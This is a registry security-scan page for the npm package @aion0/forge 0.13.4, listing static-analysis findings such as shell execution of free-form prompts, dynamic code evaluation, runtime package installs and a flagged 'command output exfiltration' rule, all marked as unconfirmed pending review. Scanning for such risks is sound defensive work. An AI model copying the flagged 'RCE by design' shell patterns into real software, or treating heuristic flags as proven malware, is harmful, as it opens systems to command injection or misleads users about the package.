registry  /  @aion0/forge  /  0.13.4

@aion0/forge@0.13.4

⚠ Under review

Unified AI workflow platform — multi-model task orchestration, persistent sessions, web terminal, remote access

Static Scan Results

scanned 1d ago · by rust-scanner

Static analysis flagged 22 finding(s) at 93.0% confidence. This version is warn-only unless an AI or security-team review confirms malicious behavior.

Static reason
High-risk behavior combination matched malicious policy.; previous stored version diff introduced dangerous source

Decision evidence

public snapshot
Behavioral surface
Source
ChildProcessCryptoDynamicRequireEnvironmentVarsEvalFilesystemNetworkShellWebSocket
Supply chain
HighEntropyStringsUrlStrings
ManifestNo manifest risk signals triggered.
scanned 485 file(s), 4.62 MB of source, external domains: 0.0.0.0, 127.0.0.1, api.anthropic.com, api.deepseek.com, api.github.com, api.openai.com, api.telegram.org, api.x.ai, cli.github.com, dashscope.aliyuncs.com, enterprise-center.example.com, example.com, generativelanguage.googleapis.com, git-scm.com, github.com, gitlab.com, nvd.nist.gov, raw.githubusercontent.com, registry.npmjs.org, www.w3.org

Source & flagged code

15 flagged · loading source
app/api/craft-system/publish/auto/route.tsView file
19// args[0] is the program; the rest are literal arguments. Throws on non-zero exit. L20: function exec(args: readonly string[], cwd?: string, timeout = 60000): string { L21: return run(args[0], args.slice(1), { cwd, timeout, maxBuffer: 10 * 1024 * 1024 });
High
Child Process

Package source references child process execution.

app/api/craft-system/publish/auto/route.tsView on unpkg · L19
lib/plugins/executor.tsView file
140async function executeShell(action: PluginAction, ctx: Record<string, any>): Promise<PluginActionResult> { L141: // Shell actions run a free-form `/bin/sh -c` built from a template + request L142: // params — RCE by design. Enforce the operator opt-in flag HERE, at the single
High
Shell

Package source references shell execution.

lib/plugins/executor.tsView on unpkg · L140
lib/crafts/runtime.tsView file
17// Function-wrapped dynamic import so Turbopack doesn't try to statically resolve the URL. L18: const dynamicImport = new Function('u', 'return import(u)') as (u: string) => Promise<any>; L19:
High
Eval

Package source references dynamic code evaluation.

lib/crafts/runtime.tsView on unpkg · L17
app/api/monitor/route.tsView file
101try { L102: const { readFileSync } = require('fs'); L103: const { join } = require('path');
Medium
Dynamic Require

Package source references dynamic require/import behavior.

app/api/monitor/route.tsView on unpkg · L101
app/api/crafts/route.tsView file
13const projectPath = url.searchParams.get('projectPath'); L14: if (!projectPath) return NextResponse.json({ error: 'projectPath required' }, { status: 400 }); L15: const all = listProjectCrafts(projectPath);
Low
Weak Crypto

Package source references weak cryptographic algorithms.

app/api/crafts/route.tsView on unpkg · L13
cli/mw.mjsView file
501}); L502: import { execSync, spawnSync } from "node:child_process"; L503: import { existsSync as existsSync2, readdirSync, statSync } from "node:fs"; ... L507: const port = portArgIdx >= 0 ? process.argv[portArgIdx + 1] : void 0; L508: return process.env.MW_URL || `http://localhost:${port || "8403"}`; L509: }
High
Same File Env Network Execution

A single source file combines environment access, network access, and code or shell execution; review context before blocking.

cli/mw.mjsView on unpkg · L501
lib/task-manager.tsView file
6import { randomUUID } from 'node:crypto'; L7: import { spawn, execSync } from 'node:child_process'; L8: import { realpathSync, existsSync } from 'node:fs'; ... L245: let entry: TaskLogEntry & { _truncated?: number; _index?: number }; L246: try { entry = JSON.parse(r.value); } L247: catch { entry = { type: 'system', content: '<unparseable entry>' } as any; } ... L561: _tmuxHookInstalled = true; L562: try { installForgeStopHook(Number(process.env.PORT) || 8403); } catch {} L563: } ... L607: // entire Next.js worker and triggering a supervisor restart loop. L608: const shell = process.env.SHELL && process.env.SHELL.endsWith('bash') ? process.env.SHELL : '/bin/bash'; L609: const child = spawn(shell, ['-c', task.prompt], {
Critical
Command Output Exfiltration

Source executes local commands and sends command output to an external endpoint.

lib/task-manager.tsView on unpkg · L6
bin/forge-server.mjsView file
67// installed npm-package copy (.npmrc isn't published). L68: execSync('npm install --include=dev --legacy-peer-deps', { cwd: ROOT, stdio: 'inherit' }); L69: }
High
Runtime Package Install

Package source invokes a package manager install command at runtime.

bin/forge-server.mjsView on unpkg · L67
check-forge-status.shView file
path = check-forge-status.sh kind = build_helper sizeBytes = 3853 magicHex = [redacted]
Medium
Ships Build Helper

Package ships non-JavaScript build or shell helper files.

check-forge-status.shView on unpkg
docs/Forge_Strategy_Research_2026.docxView file
path = docs/Forge_Strategy_Research_2026.docx kind = high_entropy_blob sizeBytes = 23982 magicHex = [redacted]
High
Ships High Entropy Blob

Package ships high-entropy non-source blobs.

docs/Forge_Strategy_Research_2026.docxView on unpkg
path = docs/Forge_Strategy_Research_2026.docx kind = compressed_blob sizeBytes = 23982 magicHex = [redacted]
Medium
Ships Compressed Blob

Package ships compressed or archive-like blobs.

docs/Forge_Strategy_Research_2026.docxView on unpkg
path = docs/Forge_Strategy_Research_2026.docx kind = nested_archive_needs_inspection sizeBytes = 23982 magicHex = [redacted]
Low
Nested Archive Needs Inspection

Package ships a nested archive or MCP bundle that was inventoried but not recursively analyzed.

docs/Forge_Strategy_Research_2026.docxView on unpkg
lib/init.tsView file
matchType = previous_version_dangerous_delta matchedPackage = @aion0/forge@0.11.19 matchedIdentity = npm:QGFpb24wL2Zvcmdl:0.11.19 similarity = 0.908 summary = stored previous version shares package body but lacks this dangerous source file
Critical
Previous Version Dangerous Delta

This package version adds a dangerous source file absent from the previous stored version; route for source-aware review.

lib/init.tsView on unpkg
lib/help-docs/21-build-connector.mdView file
159patternName = generic_password severity = medium line = 159 matchedText = password...en}'
Medium
Secret Pattern

Hardcoded password in lib/help-docs/21-build-connector.md

lib/help-docs/21-build-connector.mdView on unpkg · L159
208patternName = generic_password severity = medium line = 208 matchedText = password...rd}'
Medium
Secret Pattern

Hardcoded password in lib/help-docs/21-build-connector.md

lib/help-docs/21-build-connector.mdView on unpkg · L208

Findings

2 Critical6 High8 Medium6 Low
CriticalCommand Output Exfiltrationlib/task-manager.ts
CriticalPrevious Version Dangerous Deltalib/init.ts
HighChild Processapp/api/craft-system/publish/auto/route.ts
HighShelllib/plugins/executor.ts
HighEvallib/crafts/runtime.ts
HighSame File Env Network Executioncli/mw.mjs
HighRuntime Package Installbin/forge-server.mjs
HighShips High Entropy Blobdocs/Forge_Strategy_Research_2026.docx
MediumDynamic Requireapp/api/monitor/route.ts
MediumNetwork
MediumEnvironment Vars
MediumShips Build Helpercheck-forge-status.sh
MediumShips Compressed Blobdocs/Forge_Strategy_Research_2026.docx
MediumStructural Risk Force Deep Review
MediumSecret Patternlib/help-docs/21-build-connector.md
MediumSecret Patternlib/help-docs/21-build-connector.md
LowScripts Present
LowWeak Cryptoapp/api/crafts/route.ts
LowFilesystem
LowHigh Entropy Strings
LowUrl Strings
LowNested Archive Needs Inspectiondocs/Forge_Strategy_Research_2026.docx